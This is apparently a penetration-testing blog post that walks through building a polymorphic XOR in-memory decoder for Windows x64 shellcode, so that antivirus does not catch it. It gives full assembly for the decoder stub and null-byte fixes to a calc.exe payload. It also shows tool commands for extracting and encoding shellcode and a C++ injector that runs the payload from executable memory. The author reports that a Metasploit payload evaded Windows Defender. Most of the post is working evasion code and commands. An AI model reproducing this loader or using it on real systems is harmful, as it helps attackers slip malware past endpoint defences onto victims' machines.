Inhaltsverzeichnis

Obfuscation: polymorphic in-memory decoder
Diskussion

IT-Security, Windows, Kali, pentest, obfuscation, blog, english

Obfuscation: polymorphic in-memory decoder

Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. In the last part we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.

XOR decoder

I have taken the XOR decoder from doyler.net and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:

_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP

JMP-CALL-POP is a technique that allows us to execute code independently of memory. In this first step, we now jump to the jump label call_decoder

call_decoder:
    call decoder        ; RSP points to the next instruction (the shellcode) 
 
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...

Here we see that the CALL-instruction directly calls another part of the programme. As soon as this happens, the register RSP saves the pointer to the next command (in our case the shellcode) on the stack.

decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack

In the called part of the programme, we save the pointer from the stack to the register RSI and know where to address our shellcode in memory.

Now we move on to the actual decryption routine:

decode:
    xor byte [rsi], 0x3F      ; The byte RSI points to, will be XORed by 0x3F
    jz Shellcode              ; jump out of the loop if 0: RSI xor 0x3F = 0
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until each byte was decoded

xor byte [rsi], 0x3F now decodes the byte represented by RSI is addressed. In this case, this is the first byte of the shellcode. The key for decoding is 0x3F and can be changed according to the original coding.

jz Shellcode now checks whether the decoded byte 0x00 corresponds.

$Byte \neq 0$

If the result is negative, the code jumps to the next instruction: inc rsi

RSI is incremented and thus points to the next byte in the shellcode, which is decoded during the next run. jmp short decode jumps back to the beginning of the function.

$Byte = 0$

If the result is positive, the loop is interrupted and the shellcode is executed. It is important to append the key to the shellcode here, because:

0x3F XOR 0x3F = 0x00

This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.

jz shellcode now jumps directly to our decoded shellcode and executes it.

calc.exe Payload

We want to execute the calc.exe payload from from this blog post. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:

# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00

A 0-byte would thus abort the encoding process early, since jz shellcode would regard this as a signal to terminate. We therefore need to make a few modifications.

GS Register

The fix for the GS register from the previous post only removes $2/3$ 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here:

xor rax, rax
mov al, 60h
mov rax, gs:[rax]             ; 65 48 8b 00

change to:

xor rax, rax
mov rax, gs:[rax+0x60]        ; 65 48 8b 40 60

This also reduces the size of our shellcode a little.

Kernel32-Base

When searching for Kernel32Base we only use the register RAX without calculation. This also results in a 0 byte. Here, however, we can use the register RBX register and thus avoid the 0 bytes.

mov rax, [rax]				; 48 8b 00
mov rax, [rax]  			; 48 8b 00

change to:

mov rbx, [rax]  			; 48 8b 18
mov rax, [rbx]   			; 48 8b 03

JMP SHORT

jmp short InvokeWinExec            ; eb 00

Here the code jumps to the next instruction. As the code also does this without JMP we can comment out the line.

Compile

We can compile the code and get a clean op-code.

nasm -f win64 calc.asm -o calc.o

XOR decoder stub

Prepare calc.exe payload

We now need to edit the op-code a little in order to be able to use it in the decoder. I use my ShellCode tool for this ShenCode:

python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!

Step by step:

We extract the actual shellcode from the file calc.o and save it in calc.raw (from offset 60 to 311)
We encode the extracted code with the key 63 and save the result in calc.xor, 63 decimal corresponds to 3F Hexadecimal
We output the encoded shellcode in C# format (which we can also use for assembler)

We save the output, remove the line breaks and append our „magic byte“ 0x3F at the end.

XOR decoder and payload

Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared code into the last instruction of the XOR decoder:

 ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f

We also check whether the XOR key matches:

decode:
    xor byte [rsi], 0x3F

If everything is correct, we compile our decoder:

nasm -f win64 xor-decoder.asm -o xor-decoder.o

We then search for the shellcode offsets, extract our code and prepare it for our Inject.cpp file:

python shencode.py formatout -i xor-decoder.o -s inspect
 
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
 
python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
 
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
 
python shencode.py formatout -i xor-decoder.stub -s c
 
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!

Inject.cpp

We can now insert the bytes we have just prepared into our injector programme and compile it.

#include <stdio.h>
#include <windows.h>
#include <iostream>
#pragma warning
 
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
 
int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
	memcpyPtr(exec, payload, byteArrayLength);
	((void(*)())exec)();
    return 0;
}

Debug

For testing purposes, I have started a debugger and am now navigating to the memory area of the XOR decoder. During the debug, you can see step-by-step how the instructions in the lower area are decoded. This can be seen in the images below the call statement (which is Shellcode: db ... corresponds to).

The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.

Test with a Metasploit payload

The whole thing also works with a Metasploit payload:

Conclusion

To simplify the process, I have integrated the XOR stub as a template in ShenCode as a template. With two commands, we generate an XOR in-memory decoder:

python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63

The XOR decoder provides effective memory protection. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.